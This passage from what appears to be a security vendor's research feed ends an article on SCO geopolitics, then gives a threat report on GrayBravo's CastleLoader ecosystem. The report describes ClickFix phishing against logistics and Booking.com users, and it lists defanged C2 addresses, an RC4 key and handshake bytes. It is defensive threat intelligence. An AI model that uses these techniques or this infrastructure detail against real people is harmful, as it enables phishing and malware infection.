        <p>Despite the fact that Russia, India, and China’s latest trilateral engagement took place at the SCO <a href="https://www.cgtn.com/specials/2025/sco-summit-.html">Summit</a> in 2025, the SCO is unlikely to facilitate a deeper trilateral relationship, as it is encumbered by competing interests. The SCO was founded in 2001 to <a href="https://www.iiss.org/publications/strategic-comments/2018/shanghai-cooperation-organisation/">focus</a> on border security and ethnic minority separatism in China’s Xinjiang region, though it has since <a href="https://web.archive.org/web/20231128043631/https://eng.sectsco.org/20231127/1168690.html">expanded</a> to encompass counter-drug trafficking efforts, coordination in support of economic development, wider security-relevant matters, and other activities. India <a href="https://web.archive.org/web/20211108024435/https://eoibeijing.gov.in/eoibejing_pages/NDc,">joined</a> in 2017, after being an observer since 2005, with Russia’s support and possibly <a href="https://archive.ph/k5ehF">without</a> China’s, as Beijing sponsored Pakistan’s membership that same year.</p>
        <p>China and Russia have used the SCO to advance their geopolitical aims, including <a href="https://web.archive.org/web/20250509070130/https://www.gov.cn/yaowen/liebiao/202505/content_7023051.htm">shaping</a> future multipolarism and <a href="https://www.uscc.gov/sites/default/files/2020-11/Shanghai_Cooperation_Organization-Testbed_for_Chinese_Power_Projection.pdf">projecting</a> power. In particular, China uses the SCO as a foundation for <a href="https://carnegieendowment.org/research/2025/08/a-new-world-cop-on-the-beat-chinas-internal-security-outreach-under-the-global-security-initiative?lang=en">expanding</a> an international security architecture that is consistent with the CCP’s regime security.</p>
        <p>We assess that the SCO’s institutional capacity to take unified action is limited, in part by the fact that its members are not consistently <a href="https://merics.org/en/comment/china-and-russia-are-using-shanghai-cooperation-organization-push-alternative-global-order">aligned</a>. For example, India initially did not <a href="https://web.archive.org/web/20250616091522/https://www.mea.gov.in/Speeches-Statements.htm?dtl/39670/Statement+on+the+Shanghai+Cooperation+Organization+SCO">participate</a> in crafting a SCO statement criticizing Israeli and US strikes against Iran in June 2025, although it later <a href="https://thewire.in/diplomacy/after-june-rebuff-india-backs-sco-statement-condemning-israeli-us-strikes-on-iran">joined</a> a different SCO statement condemning the same activities. The SCO did not stop China-India border clashes in 2020, although it helped <a href="https://jamestown.org/program/the-shanghai-cooperation-organizations-limited-role-in-easing-tensions-between-china-and-india/">facilitate</a> bilateral discussions. Following the 2025 clashes between India and Pakistan, India reportedly <a href="https://www.euronews.com/2025/06/26/india-rejects-shanghai-cooperation-organisation-statement-over-claims-it-favoured-pakistan">objected</a> to an SCO statement it viewed as undermining its own position. According to one Chinese think tank director, India is <a href="https://web.archive.org/web/20250819022442/https://thechinaacademy.org/india-as-the-scos-troubled-guest/">using</a> the SCO to contain China’s influence and push back on its development and security initiatives, such as the BRI.</p>
        <h4>Indicators of Deeper Trilateral Cooperation</h4>
        <p>The table below highlights potential indicators of increasing trilateral cooperation in the future, as well as the factors most likely limiting trilateral cooperation today and going forward. China-India tension is very likely the primary constraint to the development of a trilateral bloc.</p>
      ]]></content:encoded>
            <category>Research (Insikt)</category>
            <enclosure length="0" type="image/jpg" url="https://www.recordedfuture.com/research/media_1cac80654eeccc9254abd0ff29dc936da6d1b0a7f.gif?width=1200&amp;format=pjpg&amp;optimize=medium"/>
        </item>
        <item>
            <title><![CDATA[GrayBravo’s CastleLoader Activity Clusters Target Multiple Industries]]></title>
            <link>https://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries</link>
            <guid isPermaLink="false">https://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries</guid>
            <pubDate>Tue, 09 Dec 2025 00:00:00 GMT</pubDate>
            <content:encoded><![CDATA[
        <p><em>Note: The analysis cut-off date for this report was November 10, 2025</em></p>
        <h2>Executive Summary</h2>
        <p>Insikt Group continues to monitor GrayBravo (formerly tracked as TAG-150), a technically sophisticated and rapidly evolving threat actor first identified in September 2025. GrayBravo demonstrates strong adaptability, responsiveness to public exposure, and operates a large-scale, multi-layered infrastructure. Recent analysis of GrayBravo’s ecosystem uncovered four distinct activity clusters leveraging the group’s CastleLoader malware, each defined by unique tactics, techniques, and victim profiles. These findings reinforce the assessment that GrayBravo operates a malware-as-a-service (MaaS) model.</p>
        <p>For example, one cluster, tracked as TAG-160, impersonates global logistics firms, using phishing lures and the ClickFix technique to distribute CastleLoader while spoofing legitimate emails and exploiting freight-matching platforms to target victims. Another cluster, tracked as TAG-161, impersonates Booking.com, also employing ClickFix to deliver CastleLoader and Matanbuchus and novel phishing email management tools. Further investigation through historical panel analysis linked the online persona “Sparja”, a user active on Exploit Forums, to potential GrayBravo-associated activities, based on the alias’s distinctiveness and related discussion topics.</p>
        <p>To protect against GrayBravo, security defenders should block IP addresses and domains tied to associated loaders, infostealers, and remote access trojans (RATs), flag and potentially block connections to unusual legitimate internet services (LISs) such as Pastebin, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections. Other controls include implementing email filtering and data exfiltration monitoring. See the <strong>Mitigations</strong> section for implementation guidance and <strong>Appendix H</strong> for a complete list of indicators of compromise (IoCs).</p>
        <h2>Key Findings</h2>
        <ul>
          <li>Insikt Group uncovered four distinct activity clusters leveraging GrayBravo’s CastleLoader, each exhibiting unique tactics, techniques, and procedures (TTPs) and victim profiles, reinforcing the assessment that GrayBravo operates a malware-as-a-service (MaaS) ecosystem, as previously hypothesized.</li>
          <li>One cluster, tracked as TAG-160, impersonates logistics firms and deploys phishing lures combined with the ClickFix technique to distribute CastleLoader, while spoofing legitimate emails and abusing freight-matching platforms to engage targets.</li>
          <li>Cluster 2, tracked as TAG-161, impersonates Booking.com and uses ClickFix techniques to deliver CastleLoader and Matanbuchus, relying on threat actor-controlled infrastructure and employing previously unseen phishing email management tooling.</li>
        </ul>
        <h2>Background</h2>
        <p>In September 2025, Insikt Group <a href="https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations">reported</a> on a newly identified threat actor, TAG-150, assessed to have been active since at least March 2025. Since our previous reporting, we have decided to classify TAG-150 as GrayBravo. It is believed to be responsible for developing multiple custom malware families, beginning with CastleLoader and CastleBot, and most recently, CastleRAT. It is characterized by rapid development cycles, technical sophistication, responsiveness to public reporting, and an expansive, evolving infrastructure. Alongside the discovery of the previously undocumented remote access trojan CastleRAT, Insikt Group identified GrayBravo’s multi-tiered infrastructure and its use of various supporting services, including file-sharing platforms and anti-detection tools.</p>
        <p>Although public reporting has suggested that GrayBravo operates under a malware-as-a-service (MaaS) model, supported by its delivery of diverse second-stage payloads, the proliferation of CastleLoader administration panels, and features typical of MaaS platforms, Insikt Group has not identified any advertisements or discussions of this service on underground forums. Recorded Future® Network Intelligence indicates that GrayBravo predominantly interacts with its own infrastructure, with only a limited number of external IP addresses, possibly representing customers or affiliates, observed communicating with it. Many of these connections are routed through Tor nodes, complicating attribution and classification.</p>
        <p>Through continued monitoring, Insikt Group has identified multiple clusters of activity linked to GrayBravo, reinforcing the assessment that the threat actor is operating a MaaS ecosystem (see <strong>Figure 1</strong>). This report details the tactics, techniques, and procedures (TTPs) associated with these clusters, believed to represent potential GrayBravo customers or affiliates. More specifically, Insikt Group identified four clusters linked to GrayBravo’s CastleLoader activity: one targeting the logistics sector (TAG-160), another using Booking.com-themed lures across a wider range of victims (TAG-161), a third also impersonating Booking.com but independent from the previous group, and a fourth distributing CastleLoader through malvertising and fake software updates.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_16f04fa4d373e431d0057b87c0fe966769aa4cac9.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1206" />
        </p>
        <p><em><strong>Figure 1</strong>: Overview of GrayBravo and associated clusters (Source: Recorded Future)</em></p>
        <h2>Threat Analysis</h2>
        <h3>Higher Tier Infrastructure</h3>
        <p>Insikt Group previously identified an extensive, multi-tiered infrastructure tied to GrayBravo. The infrastructure consists of Tier 1 victim-facing C2 servers associated with malware families such as CastleLoader, SecTopRAT, WarmCookie, and the newly discovered CastleRAT, as well as Tier 2, Tier 3, and Tier 4 servers, the latter of which are likely used for backup purposes. <strong>Figure 2</strong> provides an overview of the infrastructure used by GrayBravo.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_135c5c1ab7869c6f3e602baab05488fd0d435962a.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="929" />
        </p>
        <p><em><strong>Figure 2</strong>: Multi-tiered infrastructure linked to GrayBravo (Source: Recorded Future)</em></p>
        <h3>CastleRAT</h3>
        <p>CastleRAT is a remote access trojan (RAT) observed in both C and Python variants that share several core characteristics. Each variant communicates through a custom binary protocol secured with RC4 encryption and hard-coded sixteen-byte keys. Upon execution, CastleRAT queries a geolocation application programming interface (API) using <em>ip-api[.]com</em> to obtain victim geographic location and network details. Both variants support remote command execution, file download and execution, and establish an interactive remote shell. The C variant exhibits additional capabilities, including browser credential theft, keylogging, and screen capture functionality.</p>
        <h4>Infrastructure Analysis</h4>
        <p>Analysis of CastleRAT C-variant command-and-control (C2) infrastructure reveals notable operational overlap across multiple nodes sharing the RC4 key “NanuchkaUpyachka.” As illustrated in <strong>Figure 3</strong>, Insikt Group observed two CastleRAT C2 servers, <em>104[.]225[.]129[.]171</em> and <em>144[.]208[.]126[.]50</em>, maintain concurrent communications with at least three US-based victims, suggesting coordinated or redundant control channels. The overlapping traffic patterns, observed within the same daily collection windows, indicate that compromised hosts reached out to multiple C2s nearly simultaneously rather than migrating between them over time. This behavior implies a deliberate redundancy strategy employed by the threat actor. Additionally, direct communications between two CastleRAT C variants, <em>104[.]225[.]129[.]171</em> and <em>195[.]85[.]115[.]44</em>, further point to an interconnected infrastructure ecosystem rather than isolated C2 instances. Such internal connectivity could facilitate automated data synchronization, lateral control distribution, or key exchange mechanisms within the threat actor’s tooling, underscoring a more mature coordinated operational model than previously documented.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1d32a10bffa6e0b7534ef42d38aba5855ac9b6537.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="938" />
        </p>
        <p><em><strong>Figure 3</strong>: Victim communication with multiple CastleRAT C2 servers simultaneously (Source: Recorded Future)</em></p>
        <p>Notably, some CastleRAT samples <a href="https://tria.ge/250918-qj9pha1nz4/behavioral1">exhibit</a> behavior distinct from other observed variants by incorporating an elaborate handshake sequence and redundancy in their C2 communications. In these cases, the client’s initial request to the C2 server (for example, <em>77[.]238[.]241[.]203:443</em>) ends with the bytes <code>07 00 00 00</code> instead of the usual <code>01 00 00 00</code>, and the server responds with trailing bytes <code>9e ff 74 70</code> before closing the connection. A similar exchange occurs with <em>5[.]35[.]44[.]176</em>, after which the client reconnects to the first C2, transmitting only an encrypted sixteen-byte RC4 key and receiving trailing bytes <code>01 00 00 00</code> in response. The client then repeats this process with the second C2, sending <code>01 00 00 00</code> and receiving only the encrypted sixteen-byte RC4 key in return. This pattern suggests the use of additional handshake stages and dual-C2 redundancy mechanisms not seen in all CastleRAT samples.</p>
        <h4>Clustering by RC4 Key</h4>
        <p>Analysis of CastleRAT infrastructure identified multiple clusters of IP addresses grouped by hard-coded RC4 encryption keys (see <strong>Figure 4</strong>). While each RC4 key forms a distinct cluster, all clusters exhibit some degree of overlap through shared keys, suggesting a deliberate or coordinated relationship rather than a coincidental overlap. This interconnected structure suggests a shared tooling or deployment framework underpinning both CastleRAT and CastleLoader operations. Although this does not conclusively establish single-threat actor control, the degree overlap implies a common developer or operator ecosystem rather than independent, uncoordinated usage of the malware.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1be5107977c3267366984e116b333887daf9703ac.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1390" /><em><strong>Figure 4:</strong></em> <em>RC4 key clusters (Source: Recorded Future)</em>
        </p>
        <h3>CastleLoader</h3>
        <h4>Infrastructure Analysis</h4>
        <p>Insikt Group identified additional C2 infrastructure associated with CastleLoader. The related domains and IP addresses are listed in <strong>Appendix A</strong>. Notably, several domains share the same WHOIS start of authority (SOA) email address, indicating they were likely registered by the same threat actor.</p>
        <p>Notably, the domain <em>oldspicenotsogood[.]shop</em> is linked to several other domains listed in <strong>Appendix B</strong>, which are likely used for malicious activity, including impersonation of legitimate brands such as DocuSign, Norton, and TradingView. Additionally, at least one of these domains, <em>testdomain123123[.]shop</em>, has been identified as a LummaC2 C2 server.</p>
        <h3>Activity Clusters</h3>
        <p>Insikt Group identified four distinct clusters of activity associated with the deployment of CastleLoader (see <strong>Figure 4</strong>). The first cluster, tracked as TAG-160, appears to be highly targeted toward the logistics sector, employing techniques specifically tailored to this industry. In contrast, the second cluster, tracked as TAG-161, exhibits a broader targeting scope and leverages Booking.com-themed lures. The third cluster likewise impersonates Booking.com but shows no overlap with TAG-161. The fourth cluster relies on malvertising campaigns and fake software update mechanisms.</p>
        <p>Based on Insikt Group’s assessment, these clusters are associated with distinct users deploying CastleLoader, as no overlap in infrastructure or tactics was observed between them. At this stage, the exact nature of the relationship between these users and GrayBravo (formerly tracked as TAG-150) remains unclear. Insikt Group further assesses that additional CastleLoader users are likely active, supported by proprietary Recorded Future intelligence and the large number of identified panels, which collectively suggest a broader user base.</p>
        <h4>Cluster 1: Logistics Sector-Focused Activity Tracked as TAG-160</h4>
        <p>Cluster 1, tracked as TAG-160, has been active since at least March 2025 and remains operational at the time of analysis. TAG-160 employs infrastructure that impersonates logistics companies and leverages logistics-themed phishing lures, among other tactics. It uses ClickFix techniques to deliver CastleLoader, among additional payloads. Evidence suggests the cluster operates a mix of threat actor-controlled and -compromised infrastructure. Additionally, it has been observed exploiting vulnerabilities in target organizations’ systems, such as spoofing legitimate email senders from logistics companies to enhance the credibility of its phishing campaigns. In addition, Cluster 1 uses access to the legitimate freight-matching platforms DAT Freight &amp; Analytics and Loadlink Technologies for multiple purposes.</p>
        <h5>Attack Flow</h5>
        <p>Cluster 1 employs spearphishing campaigns in combination with ClickFix techniques to compromise victims. <strong>Figure 5</strong> illustrates a high-level overview of the phishing attack flow.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a3fbdc837ac260e056768d86ba670ab247081c07.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="723" />
        </p>
        <p><em><strong>Figure 5</strong>: ClickFix attack flow used by TAG-160 (Source: Recorded Future)</em></p>
        <p>The attack chain typically begins with either a spoofed legitimate email address (for example, <em>no-reply[@]englandlogistics[.]com</em>) or a threat actor-controlled address associated with a typosquatted domain (for example, <em>englandloglstics[.]com</em>), impersonating companies such as England Logistics. Historically, such emails have been sent to US-based carriers, presenting fraudulent freight quotes that appear to originate from England Logistics. However, other organizations likely to be influenced by logistics-themed lures cannot be ruled out as potential targets.</p>
        <p>The emails prompt recipients to click a link to view a supposed rate confirmation for a shipment, instructing them to copy and paste the link into a browser if it does not open directly. The threat actors often add a sense of urgency, warning that the link will soon expire. Clicking the link leads victims to a landing page designed to harvest information (see <strong>Figure 6</strong>). Insikt Group has <a href="https://www.urlquery.net/report/99d39dd3-bfd6-44fa-9275-e7d7e7a22ac9">observed</a> multiple variations of these landing pages.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_155561bfb43adf9b6751ba6800e35c480f96c98ed.png?width=750&amp;format=png&amp;optimize=medium" width="966" height="1052" />
        </p>
        <p><em><strong>Figure 6</strong>: “dpeforms” lure used by TAG-160 (Source: Recorded Future)</em></p>
        <p>Notably, although Insikt Group was unable to retrieve the landing page associated with another Cluster 1–linked domain, <em>loadstracking[.]com</em>, indexed Google search results indicate that the domain likely hosted the same or a similar page as observed in <strong>Figure 7</strong>. DPE likely stands for “Direct Port Entry,” which is a system designed for exporters, allowing goods to be directly moved from their premises to the port and loaded onto the vessel for export without being transferred to a container freight station.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a43f26ffef45a6c789ad537c5e1232e719f5353f.png?width=750&amp;format=png&amp;optimize=medium" width="743" height="147" />
        </p>
        <p><em><strong>Figure 7</strong>: “dpeforms” page found in Google Search (Source: Recorded Future)</em></p>
        <p>After submitting their information, the victim is presented with ClickFix-style instructions, guiding them through a series of steps purportedly required to complete a document signing process (see <strong>Figure 8</strong>). By incorporating the DocuSign logo, the threat actors likely aim to enhance the perceived legitimacy of the page and further deceive the victim.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1a29b8734977ac6a714e89ce057ad87cfbcb12c81.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="633" />
        </p>
        <p><em><strong>Figure 8</strong>: DocuSign-themed ClickFix used by TAG-160 (Source: Recorded Future)</em></p>
        <p>By following the instructions shown in <strong>Figure 8</strong>, the victim unknowingly executes the command illustrated in <strong>Figure 9</strong>. This command runs silently in the background, downloads and extracts a payload archive from a remote IP address, executes a Python-based malware using <code>pythonw.exe</code>, and displays a decoy message to appear legitimate. Observed payloads delivered through this method include CastleLoader, HijackLoader, Rhadamanthys, and zgRAT.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_194d883d95935fed30bcd62de8a8aa760b4f8dd9d.png?width=750&amp;format=png&amp;optimize=medium" width="1262" height="206" />
        </p>
        <p><em><strong>Figure 9</strong>: ClickFix command (Source: Recorded Future)</em></p>
        <h5>Use of Compromised Infrastructure</h5>
        <p>As part of TAG-160’s phishing infrastructure, the threat actors appear to rely not only on spoofed email addresses, as previously described, but also on compromised systems. Insikt Group has observed indications that the threat actors likely leveraged compromised infrastructure to send phishing emails. For example, at least one domain used to distribute phishing messages contained malware logs from infostealers such as LummaC2, including stolen credentials for a Namecheap account.</p>
        <h5>Infrastructure Analysis</h5>
        <p>Insikt Group identified a large number of domains and IP addresses associated with Cluster 1, all of which either impersonate logistics companies or align with logistics-themed phishing lures (see <strong>Appendix C</strong>). Notably, the majority of these domains include the subdomain <em>apps[.]englandlogistics</em> (for example, <em>apps[.]englandlogistics[.]rateconfirmations[.]com</em>), suggesting they were likely designed to impersonate England Logistics, as outlined in the previous section. One domain, <em>loadstrucking[.]com</em>, instead featured the subdomain <em>app[.]england</em>, following a similar naming pattern.</p>
        <p>Insikt Group <a href="https://urlscan.io/result/0197f23f-1845-74dd-90af-539a30c3aa3e">identified</a> the subdomain <em>files[.]loadstracking[.]com</em>, hosted on the IP address <em>89[.]185[.]84[.]211</em> between July 6 and September 26, 2025, which was serving the file <code>newtag.zip</code> (SHA256: d87ccd5a2911e46a1efbc0ef0cfe095f136de98df055eacd1c82de76ae6fecec). The ZIP folder contained a legitimate WinGup executable for Notepad++ that sideloaded a malicious libcurl.dll identified as DonutLoader. This loader subsequently retrieved three intermediate payloads from the legitimate subdomain <em>files-accl[.]zohoexternal[.]com</em>.</p>
        <h5>Domain Re-Registration Tactic</h5>
        <p>Similarly, Insikt Group assesses that to further enhance the perceived legitimacy of their infrastructure, the threat actor deliberately re-registered domains previously associated with legitimate logistics companies, in addition to using typosquatted domains. <strong>Figure 10</strong> provides two examples of this activity.</p>
        <div>
          <div>
            <div>
              <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1767d51180ebfc148db82f1ef427279295a0b4538.png?width=750&amp;format=png&amp;optimize=medium" width="1082" height="206" />
            </div>
          </div>
        </div>
        <p><em><strong>Figure 10</strong>: Re-registration of logistics-themed domains (Source: Recorded Future)</em></p>
        <p>Notably, the domain <em>cdlfreightlogistics[.]com</em> appears to have previously hosted a website associated with the legitimate company CDL Freight Logistics, Inc. in 2023. Similarly, the domain <em>hometownlogisticsllc[.]com</em> hosted a website for Hometown Logistics LLC in 2021 (see <strong>Figure 11</strong>).</p>
        <div></div>
        <p><em><strong>Figure 11</strong>: Registration of domains previously owned by legitimate logistics companies (Source: Recorded Future)</em></p>
        <h5>Public Complaints and Suspected Access to DAT and Loadlink</h5>
        <p>Some of the domains listed in the <strong>Infrastructure Analysis</strong> section have been publicly referenced in connection with suspicious or fraudulent activity. For example, the email address <em>david[@]cdlfreightlogistics[.]com</em>, associated with the domain <em>cdlfreightlogistics[.]com</em>, first appeared on August 26, 2025, in a public Telegram channel named “current_hot_loads”, a forum used by individuals and companies in the logistics industry to share information such as market rates. In that instance, a user asked other members whether an email was legitimate (see <strong>Figure 12</strong>). Several respondents indicated they did not believe it to be legitimate.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1416daca3dfc49f61ff3c646109de20af7819dbea.png?width=750&amp;format=png&amp;optimize=medium" width="800" height="413" />
        </p>
        <p><em><strong>Figure 12:</strong></em> <em>Example phishing email sent by TAG-160 (Source: Recorded Future)</em></p>
        <p>While Insikt Group was unable to obtain additional details about the email exchange linked to the email posted in the channel, the available text suggests that the threat actor initially contacted potential victims without including malicious content, likely aiming to establish rapport before sending follow-up messages containing malicious links.</p>
        <p>In another instance, Insikt Group identified a post from an employee of a legitimate logistics company based in Rhode Island, USA, describing an incident in which a threat actor created accounts impersonating their company on DAT Freight &amp; Analytics (<em>dat.com</em>) and Loadlink Technologies (<em>loadlink.ca</em>), both platforms operating in the freight matching industry (see <strong>Figure 13</strong>). The fraudulent registrations used fake company information, including the email address <em>paul[@]mrlogsol[.]ca</em>, which is associated with Cluster 1–linked infrastructure. Notably, in line with Cluster 1’s typical patterns, the email addresses used in these operations often consist of only a first name (for example, Paul). The employee reported having contacted both DAT and Loadlink to alert them to the fraudulent activity.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_197d2097858ae7d6502840ec86c8d25d764e75569.png?width=750&amp;format=png&amp;optimize=medium" width="890" height="788" />
        </p>
        <p><em><strong>Figure 13</strong>: Complaint on Facebook written by an individual targeted by TAG-160 (Source: Recorded Future)</em></p>
        <p>Based on a confirmation email from one of the platforms’ abuse reporting teams, which the employee shared on Facebook as well, it appears that the threat actor was also using a Gmail address impersonating their company, <em>maritza[.]rmlogisticsol[@]gmail[.]com</em> (see <strong>Figure 14</strong>).</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_101b71323b17bacddaaeb2ba1f64855fb611f5936.png?width=750&amp;format=png&amp;optimize=medium" width="1128" height="988" />
        </p>
        <p><em><strong>Figure 14</strong>: Email shared by an individual targeted by TAG-160 (Source: Recorded Future)</em></p>
        <p>Threat actors associated with Cluster 1 appear to have access to fraudulent DAT and Loadlink accounts, as evidenced by a user report of fraudulent activity on Facebook (see <strong>Figure 13</strong>) and further supported by additional profiles identified by Insikt Group (see <strong>Figure 15</strong>). Furthermore, Insikt Group assesses that the threat actors may also have access to compromised legitimate accounts, given the substantial volume of stolen credentials associated with the domains <em>dat[.]com</em> and <em>loadlink[.]ca</em> observed in Recorded Future Identity Intelligence.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1eb360521afb816016f9bf42b54a29065e55cd924.png?width=750&amp;format=png&amp;optimize=medium" width="1280" height="445" />
        </p>
        <p><em><strong>Figure 15</strong>: Account information linked to TAG-160 (Source: Recorded Future)</em></p>
        <p>Access to platforms like DAT Freight &amp; Analytics and Loadlink Technologies not only enables the threat actors to enhance the appearance of legitimacy, allowing them to maintain plausible profiles should potential victims attempt verification, but also provides opportunities to gather contact information for prospective targets and obtain additional contextual data, such as details on specific loads, dates and times, documents, or related materials, which can then be repurposed as spearphishing lures. In addition, although not verified in this specific case, the threat actors may also post fraudulent load listings containing malicious content, potentially resulting in malware infections.</p>
        <h5>Possible Overlap with September 2024 Campaign</h5>
        <p>In September 2024, Proofpoint <a href="https://www.proofpoint.com/us/blog/threat-insight/security-brief-actor-uses-compromised-accounts-customized-social-engineering">reported</a> on an unattributed activity cluster observed since at least May 2024. The threat actors targeted transportation and logistics companies in North America to distribute various malware families, including LummaC2, StealC, and NetSupport RAT, as well as remote monitoring and management (RMM) tools such as SimpleHelp, PDQ Connect, Fleetdeck, and ScreenConnect. The campaigns employed several techniques: The threat actors compromised legitimate email accounts belonging to transportation and shipping companies, injecting malicious content into existing email threads to enhance credibility. They also used compromised accounts on DAT Freight &amp; Analytics and Loadlink platforms to post fraudulent load listings containing malicious URLs leading to RMM downloads. Lastly, they launched broader phishing waves that directed recipients to staging web pages hosting RMM installers. Most campaigns involved Google Drive URLs or attached .URL shortcut files that, when executed, used SMB to retrieve an executable from a remote share, leading to malware installation.</p>
        <p>While Insikt Group has not identified direct technical overlaps (for example, shared infrastructure), the similar targeting and partially overlapping tactics, particularly the use of DAT Freight &amp; Analytics and Loadlink, suggest a possible connection between this activity cluster and Cluster 1 (this is a low-confidence assessment).</p>
        <p>Notably, in November 2025, Proofpoint <a href="https://www.proofpoint.com/us/blog/threat-insight/remote-access-real-cargo-cybercriminals-targeting-trucking-and-logistics">reported</a> again on a possibly related activity where cybercriminals targeted trucking and logistics companies using RMM tools to hijack shipments. The attackers lured victims through fake load postings or compromised email threads, delivering malware or RMM software to gain access. This campaign highlights the growing convergence of cyber and physical cargo theft as criminals exploit digital logistics systems.</p>
        <h4>Cluster 2: Matanbuchus and Mailer Tool Activity Tracked as TAG-161</h4>
        <p>Cluster 2, tracked as TAG-161, has been active since at least June 2025 and remains operational at the time of analysis. The cluster leverages infrastructure impersonating Booking.com and employs ClickFix techniques. It primarily delivers CastleLoader and other payloads, including Matanbuchus. Notably, Insikt Group observed this cluster using Matanbuchus. Evidence indicates that the cluster relies mainly on threat actor-controlled infrastructure. Furthermore, Insikt Group identified a previously unreported phishing email management tooling, which appears to be used by threat actors linked to Cluster 2.</p>
        <h5>Matanbuchus Activity and Booking.com-Themed Infrastructure</h5>
        <p>Alongside CastleLoader, several Matanbuchus samples were distributed through Booking.com-themed ClickFix campaigns associated with Cluster 2. Notably, Insikt Group had previously reported Matanbuchus activity linked to CastleRAT in an earlier publication, where the Matanbuchus C2 panel was hosted on the adjacent IP address, <em>185[.]39[.]19[.]164</em> (see <strong>Figure 16</strong>).</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_1fee0f400f126652867b44778e0424c29d3f6aac1.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" />
        </p>
        <p><em><strong>Figure 16</strong>: Matanbuchus panel on</em> 185[.]39[.]19[.]164 <em>(Source: Recorded Future)</em></p>
        <p>Matanbuchus is a C-based downloader MaaS available since 2021. One of its primary objectives is secrecy, which is in part fostered by limiting sales to a select number of customers. Currently at version three, it is continually maintained and improved by its creator BelialDemon. <a href="https://app.recordedfuture.com/portal/intelligence-card/edxAL9/overview?organization=uhash:5cJsHMHeSM">BelialDemon</a> offers Matanbuchus 3.0 as a monthly rental service with two pricing tiers based on the communication protocol: $10,000 per month for the <a href="https://app.recordedfuture.com/portal/intelligence-card/0SsNc/overview?organization=uhash:5cJsHMHeSM"></a><a href="https://app.recordedfuture.com/portal/intelligence-card/0SsNc/overview?organization=uhash:5cJsHMHeSM">HTTPS</a>-based version and $15,000 per month for the DNS-based version.</p>
        <p>Recorded Future Malware Intelligence’s most recent Matanbuchus sample at the time of writing <a href="https://tria.ge/251009-y1lyrsyzcx/behavioral1">communicated</a> with its C2 server at <em>mechiraz[.]com</em>, a domain behind Cloudflare but linked to the IP address <em>5[.]178[.]1[.]8</em> (TRIBEKA-AS, PA; AS211059). This IP address was also associated with the domain <em>nicewk[.]com</em>, previously <a href="https://www.morphisec.com/blog/ransomware-threat-matanbuchus-3-0-maas-levels-up/">reported</a> by Morphisec. Historical analysis of the same IP revealed several additional Matanbuchus C2 domains, including <em>galaxioflow[.]com</em> and <em>nimbusvaults[.]com</em>.</p>
        <h5>Additional Booking.com-Themed Infrastructure</h5>
        <p>By analyzing the same /24 CIDR range that hosted the Matanbuchus infrastructure during the period of observed activity, Insikt Group identified additional IP addresses and domains linked to Booking.com-themed ClickFix operations. These network indicators, detailed in <strong>Appendix D</strong>, are tracked by Insikt Group as part of Cluster 2.</p>
        <h5>Phishing Email Management Tooling</h5>
        <p>By analyzing the IP addresses hosting the domains listed in <strong>Appendix D</strong>, Insikt Group identified three that stood out for each hosting three previously unreported websites or management panels operating on high ports. The panels featured the following HTML titles: “Менеджер Email”, “Менеджер Редиректов и рассылок”, and “Менеджер Редиректов и Email” (translated as “Redirect and Email Manager”). Based on their visual appearance, technical implementation, and thematic focus, Insikt Group assesses that these websites are used in tandem as part of campaigns specifically targeting Booking.com.</p>
        <h5>Website 1: Redirect and Email Manager (“Менеджер Редиректов и Email”)</h5>
        <p>The first website, <a href="https://urlscan.io/result/0199c9ff-8739-76c3-b84e-a6c997c2e901">hosted</a> on port 56723, serves as a web-based interface for managing bulk redirections and email campaigns (see <strong>Figure 17</strong>). It integrates redirect generation, SMTP configuration, and email distribution capabilities within a single dashboard. The design, terminology, and functionality closely align with those typically observed in malspam or phishing infrastructure management panels.</p>
        <p>
          <img loading="lazy" alt="" src="https://www.recordedfuture.com/media_136c896a9d13593c36ce2ff3aa14bf18009f7b8df.png?width=750&amp;format=png&amp;optimize=medium" width="1600" height="1200" /><em><strong>Figure 17</strong>: Page linked to “Redirect and Email Manager” tool (Source: Recorded Future)</em>
        </p>
        <p>Within the document object model (DOM) of the website, Insikt Group identified two email addresses, with one of them being likely a compromised account used to send phishing emails. At the time of discovery, the rambler email address, likely a burner account, appeared within the page’s SMTP configuration with associated credentials, indicating its use as the primary sender account for automated bulk email delivery, consistent with the panel’s design for coordinated phishing or spam distribution. The DOM also contained an AWS access key.</p>
        <p>Additionally, the DOM referenced a set of domains, some of which are listed in <strong>Appendix D</strong>, while others were newly identified and are listed in <strong>Appendix E</strong>. By searching for the phrase “Сервис редиректов работает для [domain]” (translated as “The redirect service works for [domain]”), Insikt Group discovered further related domains, likewise shown in <strong>Appendix E</strong>.</p>
        <h5>Website 2: Email Manager (“Менеджер Email”)</h5>
